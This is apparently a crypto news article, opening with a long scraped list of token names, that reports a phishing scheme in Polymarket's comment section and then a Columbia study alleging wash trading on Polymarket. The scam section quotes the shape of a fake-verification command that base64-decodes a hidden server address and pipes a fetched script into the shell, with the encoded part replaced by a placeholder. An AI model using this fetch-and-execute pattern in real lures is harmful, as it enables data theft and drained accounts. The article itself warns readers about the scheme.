Bitcoin 
Ethereum 
Tether 
XRP 
BNB 
Wrapped SOL 
USDC 
Lido Staked Ether 
TRON 
Dogecoin 
Cardano 
Wrapped stETH 
Figure Heloc 
Wrapped Bitcoin 
Wrapped Beacon ETH 
WhiteBIT Coin 
Chainlink 
Hyperliquid 
Bitcoin Cash 
Stellar 
Wrapped eETH 
USDS 
Binance Bridged USDT (BNB Smart Chain) 
LEO Token 
Ethena USDe 
WETH 
Zcash 
Hedera 
Litecoin 
Coinbase Wrapped BTC 
Sui 
Avalanche 
Monero 
Shiba Inu 
Uniswap 
Polkadot 
Toncoin 
Cronos 
Ethena Staked USDe 
Dai 
Mantle 
MemeCore 
World Liberty Financial 
Canton 
USDT0 
sUSDS 
Bittensor 
Internet Computer 
NEAR Protocol 
Aave 
PayPal USD 
Bitget Token 
USD1 
OKB 
Pump.fun 
Currency One USD 
BlackRock USD Institutional Digital Liquidity Fund 
Pepe 
Ethereum Classic 
Ethena 
Jito Staked SOL 
Aptos 
Tether Gold 
Aster 
Binance-Peg WETH 
Ondo 
Falcon USD 
Jupiter Perpetuals Liquidity Provider Token 
Pi Network 
POL (ex-MATIC) 
USDtb 
Worldcoin 
Filecoin 
KuCoin 
HTX DAO 
Official Trump 
Arbitrum 
Algorand 
Rocket Pool ETH 
Provenance Blockchain 
Binance Staked SOL 
VeChain 
Cosmos Hub 
Gate 
Kaspa 
PAX Gold 
Kinetiq Staked HYPE 
BFUSD 
Binance Bridged USDC (BNB Smart Chain) 
syrupUSDT 
Kelp DAO Restaked ETH 
Wrapped BNB 
Function FBTC 
Render 
Flare 
Lombard Staked BTC 
Sky 
Quant 
syrupUSDC 
Liquid Staked ETH 
Story 
Sei 
Jupiter 
Aerodrome Finance 
NEXO 
XDC Network 
Renzo Restaked ETH 
Global Dollar 
Bonk 
Solv Protocol BTC 
Ripple USD 
Morpho 
Circle USYC 
First Digital USD 
Pudgy Penguins 
Artificial Superintelligence Alliance 
Virtuals Protocol 
Immutable 
PancakeSwap 
Mantle Staked Ether 
Dash 
Arbitrum Bridged WBTC (Arbitrum One) 
Celestia 
clBTC 
Optimism 
Fasttoken 
Rain 
OUSG 
Superstate Short Duration U.S. Government Securities Fund (USTB) 
Jupiter Staked SOL 
Stacks 
Injective 
Lido DAO 
Starknet 
StakeWise Staked ETH 
Curve DAO 
The Graph 
Ondo US Dollar Yield 
cgETH Hashkey Cloud 
Tezos 
DoubleZero 
SPX6900 
tBTC 
L2 Standard Bridged WETH (Base) 
Marinade Staked SOL 
SOON 
Beldex 
IOTA 
Pyth Network 
Kaia 
FLOKI 
Polygon Bridged USDC (Polygon PoS) 
Polygon PoS Bridged DAI (Polygon POS) 
USDai 
Arbitrum Bridged WETH (Arbitrum One) 
Ether.Fi Liquid ETH 
Sonic 
Ethereum Name Service 
Stader ETHx 
Ether.fi 
Usual USD 
GTETH 
Plasma 
The Sandbox 
Trust Wallet 
Decred 
Mantle Bridged USDT (Mantle) 
Maple Finance 
Conflux 
Bitcoin SV 
TrueUSD 
dogwifhat 
Theta Network 
AB 
Coinbase Wrapped Staked ETH 
GALA 
BitTorrent 
Swell Ethereum 
ether.fi Staked ETH 
JasmyCoin 
Pendle 
Avalanche Bridged BTC (Avalanche) 
Steakhouse USDC Morpho Vault 
Flow 
sBTC 
Vaulta 
MYX Finance 
Binance-Peg Dogecoin 
BENQI Liquid Staked AVAX 
Helium 
Decentraland 
GHO 
ARK 
Sun Token 
Raydium 
Spiko EU T-Bills Money Market Fund 
USDD 
Wrapped HYPE 
USDB 
AINFT 
Polymarket is in the headlines again, this time because one of its senior traders with the moniker “25usdc,” sounded the alarm over a scheme that uses the platform’s comment section to prey on unsuspecting users.
This is happening at a crucial time for the Polymarket platform as it is getting ready to re-enter the U.S. market and is struggling to get ahead of rivals like Kalshi.
Screenshot of a typical message of a hacker redirecting Polymarket users to click on phishing links. Source: @25usdc via X/Twitter.
Polymarket traders on high alert
According to 25usdc, hackers have been using the Polymarket comment section to run a scam, and so far, users have lost over $500,000.
“They say: ‘Why are you not trading on Polymarket private markets? The odds are always much better on there!’” 25usdc wrote, before explaining how the whole scam works.
According to him, it all starts with them buying both Yes and No shares for a market from two separate accounts. This way, their comments are still there even when the “Holders” filter is enabled. After that, they post a URL to their site in an obfuscated form.
The URL takes the unsuspecting user to a clean-looking page with a Polymarket logo and requests users’ login via email. Once the email is verified, a new window pops up asking the user to verify their activity, imitating CloudFlare.
However 25usdc says when you click “Copy”, a command that looks something like this “curl -kfsSL $(echo ‘ENCODED_STRING==’|base64 -d)|zsh” is copied instead and the first thing it does, if the user makes the mistake of pasting it into their terminal, is decode the base64-encoded string (a server URL), after which it fetches a script from that server and immediately executes it.
The script in question can contain anything, and there will reportedly be no pop-up warning, at which point the damage has been done, and the only remedy according to 25usdc, might be turning off the Wi-Fi.
“In the end, they gather data, log everything on your system, and send a zip back to their server,” 25usdc wrote. “They then use this data to log into your accounts and steal your money.”
Other things he noticed were how carefully the group operates; for example, they cover their trails by switching wallets often, obfuscate at every step of the way, and even shut down the server that sends payloads and receives logged data when there is no active victim.
“I think the best way to address this is to allow trusted users to review comments or to introduce a downvote system that hides heavily downvoted posts,” 25usdc concluded while pointing out that the simple warning Polymarket currently displays won’t be enough.
PSA: There is no Polymarket “private market” website with “better odds”
Never enter your Polymarket email or login verification code on anything other than our official site.
— Polymarket Traders (@PolymarketTrade) November 9, 2025
New study claims Polymarket’s volume is propped up by wash trading
As Cryptopolitan reported, a recently published study by Columbia University researchers claims the volume of activity on Polymarket has been significantly inflated by wash trading.
The “artificial trading,” as the authors termed it, varied over time, but they say it accounted for an average of 25% of all buying and selling on Polymarket over the past three years.
The paper has not undergone peer review but is already up on the open-access research platform SSRN and is being reviewed by Polymarket.
To be clear, the authors do not outrightly accuse Polymarket itself for the wash trading. However, they have highlighted elements of the exchange’s crypto-based structure that make the claim plausible.
They have also suggested that the company’s customers may have independently engaged in said wash trading in an attempt to improve their chances of gaining access to a proprietary digital token that the company’s founder, Shayne Coplan, has hinted at the possibility of launching as recently as October 8th.
“I’m hopeful that Polymarket will welcome the analysis in our paper,” Yash Kanoria, a professor at Columbia University’s business school, and one of the paper’s four co-authors, said in an email. “Wash trading doesn’t add liquidity or information to the market, so it would seem valuable to distinguish authentic from inauthentic volume.”
If some of Polymarket’s volume is truly “fictitious,” the study claims it could alter the understanding of Polymarket’s relative strength in the industry and also undermine the current notion that prediction markets reflect the “wisdom of a larger crowd.”
“The potential for large-scale wash trading means that volume may be unreliable as a metric of authentic platform activity, especially in cryptocurrency-based exchanges which may not have proper safeguards,” the authors concluded.
